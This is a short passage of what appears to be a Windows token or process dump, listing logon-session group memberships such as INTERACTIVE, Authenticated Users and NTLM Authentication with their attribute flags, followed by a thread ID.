AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 114 os_tid = 0x5e4